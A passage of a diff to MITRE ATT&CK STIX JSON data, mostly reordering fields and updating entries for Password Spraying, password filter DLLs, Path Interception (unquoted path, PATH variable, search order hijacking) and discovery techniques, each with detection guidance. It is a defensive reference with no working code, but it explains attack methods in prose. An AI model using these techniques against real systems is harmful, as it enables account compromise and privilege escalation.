- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "Authentication logs",
- "Office 365 account logs"
]
},
{
@@ -18652,22 +19315,22 @@
],
"modified": "2020-03-25T20:59:05.209Z",
"created": "2020-02-11T19:05:45.829Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "DLL monitoring"
],
"x_mitre_contributors": [
"Vincent Le Toux"
],
- "x_mitre_data_sources": [
- "File monitoring",
- "DLL monitoring"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -18704,6 +19367,19 @@
],
"modified": "2020-03-29T17:11:46.504Z",
"created": "2020-02-11T18:38:22.617Z",
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)"
+ ],
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Office 365 account logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -18714,19 +19390,6 @@
"AWS",
"Azure",
"SaaS"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "Authentication logs",
- "Office 365 account logs"
- ],
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)"
]
},
{
@@ -18763,26 +19426,42 @@
],
"modified": "2020-03-26T17:17:42.457Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Sudhanshu Chauhan, @Sudhanshu_C"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring"
- ],
- "x_mitre_detection": "Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Sudhanshu Chauhan, @Sudhanshu_C"
+ ],
+ "x_mitre_version": "1.1"
},
{
+ "created": "2020-02-11T18:39:25.122Z",
+ "modified": "2020-03-29T17:13:57.172Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c",
+ "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
+ "name": "Password Spraying",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -18805,22 +19484,6 @@
"description": "Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Password Spraying",
- "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
- "id": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-29T17:13:57.172Z",
- "created": "2020-02-11T18:39:25.122Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -18851,7 +19514,7 @@
"id": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Path Interception",
- "description": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**\n\nPath interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)\n\nThere are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.\n\n### Unquoted Paths\nService paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)\n\n### PATH Environment Variable Misconfiguration\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.\n\n### Search Order Hijacking\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).",
+ "description": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**\n\nPath interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)\n\nThere are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.\n\n### Unquoted Paths\nService paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)\n\n### PATH Environment Variable Misconfiguration\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.\n\n### Search Order Hijacking\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).",
"external_references": [
{
"source_name": "mitre-attack",
@@ -18924,34 +19587,41 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-30T13:45:24.192Z",
+ "modified": "2020-07-06T18:49:35.645Z",
"created": "2017-05-31T21:30:36.140Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring"
- ],
- "x_mitre_contributors": [
- "Stefan Kanthak"
- ],
- "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. \n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_effective_permissions": [
- "User",
- "Administrator",
- "SYSTEM"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_effective_permissions": [
+ "User",
+ "Administrator",
+ "SYSTEM"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. \n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_contributors": [
+ "Stefan Kanthak"
+ ],
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
+ "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
+ "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.",
+ "name": "Path Interception by PATH Environment Variable",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -18964,13 +19634,6 @@
"url": "https://capec.mitre.org/data/definitions/capec.html"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Path Interception by PATH Environment Variable",
- "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.",
- "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -18986,7 +19649,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-26T19:59:42.456Z",
+ "modified": "2020-06-20T22:02:40.983Z",
"created": "2020-03-13T14:10:43.424Z",
"x_mitre_platforms": [
"Windows"
@@ -19002,10 +19665,34 @@
"x_mitre_is_subtechnique": true,
"x_mitre_version": "1.0",
"x_mitre_defense_bypassed": [
- "Process whitelisting"
+ "Application control"
]
},
{
+ "created": "2020-03-13T17:48:58.999Z",
+ "modified": "2020-03-26T20:03:27.496Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
+ "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
+ "name": "Path Interception by Search Order Hijacking",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -19038,30 +19725,6 @@
"description": "Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Path Interception by Search Order Hijacking",
- "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
- "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-26T20:03:27.496Z",
- "created": "2020-03-13T17:48:58.999Z",
"x_mitre_platforms": [
"Windows"
],
@@ -19087,13 +19750,23 @@
"x_mitre_version": "1.0"
},
{
- "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
- "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
- "name": "Path Interception by Unquoted Path",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2020-03-13T13:51:58.519Z",
+ "modified": "2020-03-26T19:55:39.867Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -19126,23 +19799,13 @@
"description": "absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018."
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T19:55:39.867Z",
- "created": "2020-03-13T13:51:58.519Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Path Interception by Unquoted Path",
+ "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
+ "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
"x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
"x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
@@ -19158,6 +19821,15 @@
]
},
{
+ "created": "2017-05-31T21:31:28.471Z",
+ "modified": "2020-03-26T17:42:03.337Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
+ ],
+ "type": "attack-pattern",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -19177,38 +19849,39 @@
"name": "Peripheral Device Discovery",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "x_mitre_version": "1.2",
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS"
],
- "modified": "2020-03-26T17:42:03.337Z",
- "created": "2017-05-31T21:31:28.471Z",
- "x_mitre_is_subtechnique": false,
"x_mitre_data_sources": [
"PowerShell logs",
"API monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_platforms": [
- "Windows",
- "macOS"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_version": "1.2"
+ "x_mitre_is_subtechnique": false
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:55.471Z",
